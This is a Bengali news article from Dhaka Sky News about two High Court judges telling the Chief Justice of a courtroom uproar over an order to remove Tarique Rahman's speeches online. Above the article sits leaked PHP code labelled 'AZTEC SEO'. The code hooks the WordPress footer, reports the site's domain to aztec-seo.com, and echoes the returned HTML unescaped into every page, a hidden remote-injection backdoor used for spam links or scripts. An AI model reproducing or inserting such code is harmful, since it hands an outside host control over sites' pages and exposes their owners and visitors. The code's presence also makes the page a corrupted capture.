/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); প্রধান বিচারপতিকে জানালেন দুই বিচারপতি | Dhaka Sky News

নেপাল ১৬শ কোটি টাকার বিদ্যুৎ আমদানি করল ভারত থেকে

আগের সংবাদ

বিশ্বের বৃহত্তম গ্যাস ক্ষেত্র উদ্বোধন ইরানে

পরের সংবাদ

এজলাসে হট্টগোল

প্রধান বিচারপতিকে জানালেন দুই বিচারপতি

অনলাইন ডেস্ক

প্রকাশিত: August 29, 2023 , 12:43 pm

বিএনপি চেয়ারপারসন তারেক রহমানের সাম্প্রতিক দেওয়া সব বক্তব্য অনলাইন থেকে সরানোর আদেশ দেওয়া কেন্দ্র করে এজলাস কক্ষে হট্টগোল ও ফাইল ছুঁড়ে মারা ঘটনা প্রধান বিচারপতিকে জানিয়েছেন দুই বিচারপতি।

মঙ্গলবার (২৯ আগস্ট) প্রধান বিচারপতির কার্যালয় সূত্র বিষয়টি নিশ্চিত করেছে।

সোমবার (২৮ আগস্ট) সকালে বিচারপতি মো. খসরুজ্জামান ও বিচারপতি মো. খায়রুল আলমের হাইকোর্ট বেঞ্চ বিএনপির ভারপ্রাপ্ত চেয়ারম্যান তারেক রহমানের সাম্প্রতিক বক্তব্য ইউটিউব, ফেসবুকসহ সব ধরনের সোশ্যাল মিডিয়া প্ল্যাটফর্ম থেকে অবিলম্বে ব্লক, অপসারণ বা সরিয়ে ফেলার কার্যকর পদক্ষেপ নিতে বাংলাদেশ টেলিকমিউনিকেশন রেগুলেটরি অথরিটিকে (বিটিআরসি) নির্দেশ দেন। আদালতের আদেশকে কেন্দ্র করে বিএনপিপন্থী আইনজীবীরা হট্টগোল করেন। একপর্যায়ে দুই বিচারক এজলাস ছেড়ে চলে যান।

হট্টগোলের মধ্যে এজলাস ছেড়ে যাওয়ার সাড়ে ৩ ঘণ্টা পর দুপুর ২টা ৩৫ মিনিটের দিকে বিচারপতি মো. খসরুজ্জামান ও বিচারপতি মো. খায়রুল আলম এজলাসে আসন গ্রহণ করে বিচার কাজ শুরু করেন।